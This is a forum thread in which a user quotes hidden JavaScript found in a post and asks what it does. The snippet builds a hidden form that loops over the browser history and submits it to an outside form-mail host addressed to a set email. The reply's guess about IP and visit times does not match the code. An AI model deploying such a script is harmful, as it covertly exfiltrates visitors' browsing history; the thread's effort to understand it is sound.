    Hidden JS in forum post. Can someone explain/

    Hi folks,

    I found this hidden javascript in a forum post where I frequent. I was hoping someone here might tell me its purpose and why it might be embedded in a post.

    Here it is:

    <!--
    document.write('<form action=http://www.response-o-matic.com/cgi-bin/rom.pl method="POST">'); l = history.length; for(i=0; i<l; i++)
    {document.write('<input type=hidden name=Link&nbsp;'+i+' value='+history[i]+'>');}
    document.write('<input type="hidden" name="your_email_address" value="grady-@webtv.net">
    <input type="hidden" name="email_subject_line" value="Recents"><input type="hidden" name="your_name" value="Spoon!"><input type="hidden" name="required_fields" value="your_email_address"><input type="hidden" name="reply_warning" value="off"><input type="hidden" name="submit" autosubmit="onenter"></form>');
    // -->

    The call for the script was this:
    http://www.transload.net/~expcap/spoon.js

    Thanks for any help.

    Probably to gather info about the visitor, maybe IP address, time visited, page visited, that kind of stuff.

    I don't get any results from history[i] though, don't know why he/she's done that
